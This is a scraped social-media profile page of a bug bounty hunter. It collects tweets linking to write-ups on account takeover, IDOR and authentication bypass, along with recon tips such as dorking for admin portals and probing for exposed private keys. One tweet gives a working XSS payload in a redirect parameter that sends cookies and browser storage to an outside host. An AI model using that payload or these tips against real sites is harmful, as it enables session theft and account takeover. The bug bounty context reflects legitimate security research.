Olivia
Online
SIDDHANT SHUKLA
@ghost__man01
Bug Hunter.
Jai Shree Ram 🪷🕉️
INDIA
Joined June 2021
1.4K Following
534 Followers
2.8K Posts
Pinned Tweet
Happy to be listed on @Flipkart Hall of Fame. Write-up will be👇
https://t.co/6LOZ4nGsCp
https://t.co/57QVuuUovb
#bugbountytips #bugbountytip #BugBounty #BugHunter #appsec #vapt #pentesting #cybersecurity #cybersecurityresearcher #securityresearcher #hacking #PenetrationTesting
No Username. No Password. Just a Header — A $3,000 Authentication Bypass by ALR https://t.co/lDxNxy5DkW
Credits : @00xalr nice finding brother🥳
New writeup up, do have a read folks ✨
https://t.co/5QtGq2uAba
@InfoSecComm
#bugbounty #bugbountytips #infosec
"SAML Username Collision Leading to Full ATO" by M0n3m
#InfoSec #CyberSecurity #Hacking #Vulnerability
https://t.co/cJKNtodPF8
Who to follow
Sir. Zeus
@Eyhuss1
• Retired hacker
Shreyas 
@SPY8OY
Security Researcher at @CredShields | Bug Bounty Hunter | Audits : Solidity & Rust | Pentester
Rasel Mir
@araselmir
Cyber Security Engineer @Resecurity || Intigriti Top 25 || Intigriti 2023 Q3 Leaderboard 1st || Bug Hunter || Penetration Tester || Programmer || Student
I Found a Critical Vulnerability They Paid Me $15,500
https://t.co/sXKZbsI5eU
I hacked a car company.
Here's how I gained access to hundreds of their codebases.
Many bug bounty hunters find an IDOR and stop testing as soon as they see a 403 Forbidden response. But what if that 403 isn't the end of the story?
One of the biggest lessons I've learned over the years is that access control testing is rarely as straightforward as changing an ID and checking the response.
Sometimes the most interesting findings appear when you start asking questions like:
• Is the authorization check happening in the right place?
• Is the application trusting something it shouldn't?
• Are there alternative ways to access the same resource?
• What assumptions did the developer make?
In my latest video, I demonstrate a practical technique that can help uncover authorization weaknesses that many testers overlook. Rather than focusing on theory, I walk through the entire process step-by-step in a controlled lab environment so you can understand the methodology behind it.
If you're interested in bug bounty hunting, penetration testing, or web application security, I think you'll find this one useful.
Watch here: https://t.co/3Q7NIOQPpj
Account Takeover using SSO Logins by Rikesh Baniya https://t.co/VIAUwgLwpS
@nothing @nothingindia @getpeid, there is a login issue on nothing phone 3a, I am getting logged out after 2 minutes of signing in with a Nothing account in Setting that causes logout of @essential space causing less productivity. This issue resides more than 4 months ago.
I’m in love with Next.js 🔥
Tips: I found the admin portal using Yandex dork: Rhost:*.target.*
Then I look up the js which they use Next.js look into main,chunk and search for api endpoint which I found /v2/admin/dashboard/Contacts
also you can use @badcracker api extension
Two useful writeups I recently published:
1. Zero-Click ATO via Self-Stored XSS + WAF Bypass + IDOR
🔗https://t.co/uer6ZK7VnE
2. Chained Two Logic Flaws to Break a Ticketing System
🔗https://t.co/2DSAaufeMj
Enjoy reading, and happy hacking
#bugbounty #cybersecurity
https://t.co/B1KpDcVUXF
https://t.co/JuC7iXhhD7
https://t.co/XRYfuAuBmP
@xandsz__ very good ones, about the subs discovery on bbp programs,do u just do dorking and fuzzing? cause i've found couple on bmw(which they doesnt pay but i did ATO as well) idk why i can't find on others
Found a cool bug at Meta.
From misconfigured Grafana instance to R/W access on 507 private Meta repositories.
Wrote up the full chain here:
https://t.co/LYQ0prc68d
$157k bounty awarded by @metabugbounty
Introducing my Bug Bounty Masterclass. 100% free.
I've made $2,000,000+ finding security bugs. I spent the last year turning my methodology into a complete blueprint.
4 hours of video - foundations, reconnaissance, web proxies, hands-on challenges, and certification.
Finish it in a weekend and start hacking real-world applications 🐞
Sometimes finding private keys are as simple as example(.)com/private.key ..!
.
.
#bugbounty #hackerone #bugbountytips #bugcrowd #hack #pentest #TogetherWeHitHarder
/login?redirectUrl=javascript:fetch('https://t.co/sgFFzZHc4q 0{method:'POST',%20body:JSON.stringify({cookies:document.cookie,sessionStorage:sessionStorage,localStorage:localStorage})})
Nice Free tool to keep in your bug bounty arsenal: https://t.co/fH8nxKzeCP
You never know when a forgotten blind XSS payload will suddenly come back with an email notification. 💰🎯
#BugBounty #Bugbountytips #BlindXSS #XSS #SecurityResearch #CyberSecurity #EthicalHacking #AppSec #InfoSec #BugHunter #HackerOne #YesWeHack #Intigriti
How I Chained Three Small Bugs to Cancel Anyone's Car Booking by Atharv Chawna https://t.co/WqFQFld6f2 #bugbounty #bugbountytips #bugbountytip
A Simple Edit That Paid $800: Tampering Developer Application Information #bugbounty
https://t.co/8cEzcT7RhJ
Chaining Bugs: From Unauthenticated PII Disclosure to Mass Account Takeover in a Major E-Commerce by Alareqi https://t.co/lhWs6SyF7u #bugbounty #bugbountytips #bugbountytip
From Failure to $32,000: My Bug Bounty Journey by Infosec Writeups https://t.co/hfU1Q7HgWu #bugbounty #bugbountytips #bugbountytip #infosec #BugBounty
Last Seen Users on Sotwe
그리스
Seen from Korea
gokhantest
Seen from Oman
r⁷ 🐈⬛ is seeing bts !! pride month 🏳️🌈
Seen from France
Bol Konuşmalı Yerli Amatör
Seen from Turkey
Full indonesian pride
Seen from Indonesia
✿︎ Goddess J 🎀 | Findomme ✿︎
Seen from Turkey
عمر العراقي/ البصرة
Seen from Oman
BAD BOY
Seen from Pakistan
نورث
Seen from Singapore
Türk | Porno Sex İFŞA
Seen from Turkey
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.9M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.8M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.5M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers